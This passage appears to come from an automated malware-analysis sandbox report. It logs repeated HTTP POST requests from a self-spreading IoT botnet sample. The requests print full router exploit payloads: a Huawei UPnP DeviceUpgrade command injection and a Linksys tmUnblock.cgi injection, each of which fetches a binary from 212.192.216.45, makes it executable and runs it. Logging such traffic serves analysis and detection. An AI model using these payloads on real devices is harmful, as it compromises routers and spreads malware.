6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
